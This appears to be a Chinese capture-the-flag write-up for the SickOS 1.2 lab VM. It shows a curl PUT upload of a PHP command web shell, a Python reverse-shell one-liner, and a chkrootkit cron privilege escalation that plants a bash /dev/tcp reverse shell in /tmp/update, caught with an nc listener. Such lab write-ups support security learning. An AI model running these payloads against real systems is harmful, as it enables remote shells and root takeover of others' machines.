sickos 1.2靶机打靶过程遇到问题解决方案

1.关于lighthttp旧版本

        存在请求方法的遍历,可以抓一个访问的请求包,然后将get请求更换为options,接着看返回包找的allow,就能看见所允许的方法,

2.关于curl的用法

       

1.curl查看所有能使用的请求方法如下

  curl -v -X OPTIONS http://192.168.11.131/test

2.curl指定请求方法,如put,并向指定路径写入指定内容的语法如下

  curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://192.168.11.131/test/shell.php

3.使用weevely生成的webshell,在上传后,执行linpeas扫描脚本无回显的情况解决方案

        换个webshell,比如常用的python反弹shell(这个取决于对方服务器上是否相关的运行环境)

   export RHOST="192.168.11.131";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

3.关于提权

1.区别于sickos1.1的sudo提权,sickos1.2采用的是crontab提权,也就是计划任务提权,他的基本思路是,靶机存在chkrookit这个反rootkit病毒的程序,且该程序会定期运行chkrootkit

利用条件如下

1.在/ tmp中放入一个名为'update'的非root所有者的可执行文件

2.以Root身份运行chkrootkit

Chkrootkit 版本小于0.49,其文件/ tmp /update将以root身份执行。

如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知),并且对/ tmp(没有挂载noexec)有写访问权限,就可以利用该漏洞获取root权限。

2.exp

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.11.131/443 0>&1\n' >> /tmp/update
chmod 777 /tmp/update
nc -nlvp 443

备注,可能刚开始执行完以后shell没变化或者是断开了,这时候只要再执行一次就可以,成功拿到root权限 的shell

祝各位打靶愉快,天天开心~!

  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值